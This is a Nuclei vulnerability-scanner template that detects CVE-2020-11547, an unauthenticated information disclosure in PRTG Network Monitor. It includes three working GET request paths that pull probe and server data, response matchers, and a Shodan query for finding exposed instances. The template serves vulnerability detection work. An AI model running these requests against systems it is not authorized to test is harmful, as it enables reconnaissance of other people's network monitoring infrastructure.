nuclei-templates/http/cves/2020/CVE-2020-11547.yaml

58 lines
2.2 KiB
YAML

id: CVE-2020-11547
info:
name: PRTG Network Monitor <20.1.57.1745 - Information Disclosure
author: x6263
severity: medium
description: PRTG Network Monitor before 20.1.57.1745 is susceptible to information disclosure. An attacker can obtain information about probes running or the server itself via an HTTP request, thus potentially being able to modify data and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
An attacker can exploit this vulnerability to gain sensitive information from the PRTG Network Monitor.
remediation: |
Upgrade PRTG Network Monitor to version 20.1.57.1745 or higher to mitigate the information disclosure vulnerability.
reference:
- https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
- https://github.com/ch-rigu/PRTG-Network-Monitor-Information-Disclosure
- https://nvd.nist.gov/vuln/detail/CVE-2020-11547
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-11547
cwe-id: CWE-306
epss-score: 0.0011
epss-percentile: 0.43845
cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: paessler
product: "prtg_network_monitor"
shodan-query: title:"prtg"
tags: cve,cve2020,prtg,disclosure,paessler
http:
- method: GET
path:
- "{{BaseURL}}/public/login.htm?type=probes"
- "{{BaseURL}}/public/login.htm?type=requests"
- "{{BaseURL}}/public/login.htm?type=treestat"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"
- type: word
part: body
words:
- "prtg_network_monitor"
- "Probes"
- "Groups"
condition: or
- type: status
status:
- 200
# digest: 4b0a00483046022100eaaeaea052e5c33f2facfd9d7972522381681ab0addf011875c606a2e7859404022100d956a20e8ca7cc8db7d85b5889b8d99623508aaea95dcaa2be2db781f212bc86:922c64590222798bb761d5b6d8e72950